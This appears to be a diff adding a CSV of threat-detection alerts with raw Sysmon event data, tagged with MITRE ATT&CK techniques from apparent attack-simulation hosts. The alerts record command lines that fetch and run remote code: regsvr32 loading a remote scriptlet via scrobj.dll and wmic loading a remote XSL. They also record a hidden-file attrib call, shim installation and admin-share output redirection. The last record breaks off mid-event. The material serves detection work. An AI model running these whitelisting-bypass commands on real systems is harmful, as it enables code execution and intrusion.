+[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 311373
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-09 22:01:03.894
+ 747F3D96-939F-5F07-0000-0010888E4600
+ 7456
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"
+ C:\Users\IEUser\
+ MSEDGEWIN10\IEUser
+ 747F3D96-86FA-5F07-0000-00204A8B0600
+ 0x68b4a
+ 2
+ Medium
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-86FC-5F07-0000-00101E4B0700
+ 2356
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4941
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:54.044
+ 747F3D96-6642-5D3F-0000-0010F69D8A00
+ 4896
+ C:\Windows\System32\wbem\WMIC.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
+ 747F3D96-6641-5D3F-0000-0010A38C8A00
+ 4260
+ C:\Windows\System32\cmd.exe
+ cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966388
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:49:27.697
+ 365ABB72-55D7-5C91-0000-001067BD0700
+ 2236
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421218
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.428
+ 747F3D96-75D1-5F8B-0000-00109EB23300
+ 2628
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421218
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.428
+ 747F3D96-75D1-5F8B-0000-00109EB23300
+ 2628
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 421218
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 22:53:05.428
+ 747F3D96-75D1-5F8B-0000-00109EB23300
+ 2628
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
+ C:\
+ MSEDGEWIN10\Administrator
+ 747F3D96-75D0-5F8B-0000-0020A8A83300
+ 0x33a8a8
+ 0
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-75D1-5F8B-0000-00101DAB3300
+ 2228
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4939
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:53.759
+ 747F3D96-6641-5D3F-0000-0010A38C8A00
+ 4260
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4939
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:53.759
+ 747F3D96-6641-5D3F-0000-0010A38C8A00
+ 4260
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 311365
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-07-09 22:00:45.576
+ 747F3D96-938D-5F07-0000-001043A84500
+ 7976
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ MSEDGEWIN10\IEUser
+ 747F3D96-86FA-5F07-0000-00204A8B0600
+ 0x68b4a
+ 2
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-86FC-5F07-0000-00101E4B0700
+ 2356
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4936
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:49.535
+ 747F3D96-663D-5D3F-0000-00106F608A00
+ 3240
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966382
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:48:33.639
+ 365ABB72-55A1-5C91-0000-0010D6960700
+ 2368
+ C:\Windows\System32\sdbinst.exe
+ 6.0.7600.16385 (win7_rtm.090713-1255)
+ Application Compatibility Database Installer
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
+ C:\Windows\System32\
+ EXAMPLE\user01
+ 365ABB72-5417-5C91-0000-002035340300
+ 0x33435
+ 1
+ High
+ MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
+ 365ABB72-551C-5C91-0000-001030590500
+ 2704
+ C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
+ "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 22013
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ DC1.insecurebank.local
+
+
+
+
+ technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories
+ 2019-05-19 17:32:00.478
+ DFAE8213-9310-5CE1-0000-0010EABA0A00
+ 2728
+ C:\Windows\System32\attrib.exe
+ 6.3.9600.16384 (winblue_rtm.130821-1623)
+ Attribute Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ attrib +h nbtscan.exe
+ c:\ProgramData\
+ insecurebank\Administrator
+ DFAE8213-9133-5CE1-0000-0020CC660500
+ 0x566cc
+ 2
+ High
+ SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02
+ DFAE8213-91CC-5CE1-0000-0010BEF40600
+ 3408
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4934
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-29 21:33:44.949
+ 747F3D96-6638-5D3F-0000-001067BA8900
+ 4288
+ C:\Windows\System32\regsvr32.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49829
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4933
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:45.332
+ 747F3D96-6639-5D3F-0000-001074F48900
+ 208
+ C:\Windows\System32\calc.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Calculator
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\calc.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
+ 747F3D96-6638-5D3F-0000-001067BA8900
+ 4288
+ C:\Windows\System32\regsvr32.exe
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4931
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:44.622
+ 747F3D96-6638-5D3F-0000-001067BA8900
+ 4288
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-6638-5D3F-0000-00103DA88900
+ 1652
+ C:\Windows\System32\cmd.exe
+ cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4931
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:44.622
+ 747F3D96-6638-5D3F-0000-001067BA8900
+ 4288
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-6638-5D3F-0000-00103DA88900
+ 1652
+ C:\Windows\System32\cmd.exe
+ cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4931
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:44.622
+ 747F3D96-6638-5D3F-0000-001067BA8900
+ 4288
+ C:\Windows\System32\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
+ 747F3D96-6638-5D3F-0000-00103DA88900
+ 1652
+ C:\Windows\System32\cmd.exe
+ cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557854258.250959,2019-05-14T21:17:38.250959+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 32009
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ alice.insecurebank.local
+
+
+
+
+
+ 2019-05-14 17:17:24.660
+ ECAD0485-F2EC-5CDA-0000-0010F1631500
+ 4092
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ insecurebank\Administrator
+ tcp
+ true
+ false
+ 10.59.4.20
+ alice.insecurebank.local
+ 49584
+
+ false
+ 10.59.4.11
+ DC1
+ 389
+ ldap
+
+",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1557854246.738627,2019-05-14T21:17:26.738627+04:00,,Threat,Critical,"User (insecurebank\Administrator) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( alice.insecurebank.local and IP ( 10.59.4.20 ) to hostname ( DC1 ) , IP ( 10.59.4.11 ) and port ( 389 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 32008
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ alice.insecurebank.local
+
+
+
+
+
+ 2019-05-14 17:17:24.597
+ ECAD0485-F2EC-5CDA-0000-0010F1631500
+ 4092
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ insecurebank\Administrator
+ tcp
+ true
+ false
+ 10.59.4.20
+ alice.insecurebank.local
+ 49583
+
+ false
+ 10.59.4.11
+ DC1
+ 389
+ ldap
+
+",alice.insecurebank.local,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.287385,2019-07-30T01:33:44.287385+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4929
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:44.204
+ 747F3D96-6638-5D3F-0000-00103DA88900
+ 1652
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
